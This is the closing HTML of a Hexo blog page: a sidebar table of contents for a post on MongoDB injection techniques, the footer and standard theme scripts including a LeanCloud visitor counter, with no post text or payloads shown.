              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#MongoDB概括"><span class="nav-number">1.</span> <span class="nav-text">MongoDB概括</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#直接调用类方法"><span class="nav-number">1.1.</span> <span class="nav-text">直接调用类方法</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#execute方法"><span class="nav-number">1.2.</span> <span class="nav-text">execute方法</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#攻击"><span class="nav-number">2.</span> <span class="nav-text">攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#基本操作"><span class="nav-number">2.1.</span> <span class="nav-text">基本操作</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#数组绑定时注入"><span class="nav-number">2.2.</span> <span class="nav-text">数组绑定时注入</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#ne注入"><span class="nav-number">2.2.1.</span> <span class="nav-text">$ne注入</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#regex注入"><span class="nav-number">2.2.2.</span> <span class="nav-text">$regex注入</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#拼接字符串注入"><span class="nav-number">2.3.</span> <span class="nav-text">拼接字符串注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#时间盲注"><span class="nav-number">2.4.</span> <span class="nav-text">时间盲注</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#where注入"><span class="nav-number">2.5.</span> <span class="nav-text">$where注入</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xi4or0uji</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("kjsqHE2szT8D8zBgcoS3IuDJ-gzGzoHsz", "W2CzS27kkRW94qWAYaaWlnX7");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
